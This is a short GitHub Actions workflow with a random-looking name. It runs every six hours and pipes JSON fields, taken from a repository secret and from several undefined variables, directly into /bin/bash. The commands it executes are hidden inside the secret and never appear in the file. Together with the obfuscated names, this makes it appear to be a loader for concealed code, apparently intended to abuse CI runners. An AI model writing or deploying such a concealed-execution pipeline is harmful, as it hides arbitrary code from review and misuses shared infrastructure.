name: shaobaixing3123

on:
  workflow_dispatch:
  schedule:
    - cron: '13 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: shaobaixing3123
        env:
          djuz2: ${{ secrets.djuz2 }}
        run: |
          echo $djuz2 | jq -r .emco8604 | /bin/bash
          echo $c723 | jq -r .fn62938 | /bin/bash
          echo $o41369 | jq -r .slggb760 | /bin/bash
          echo $z32092 | jq -r .k6770 | /bin/bash
          echo $pgkdq72051 | jq -r .pkeag20056 | /bin/bash
          echo $s568 | jq -r .qubky5550 | /bin/bash

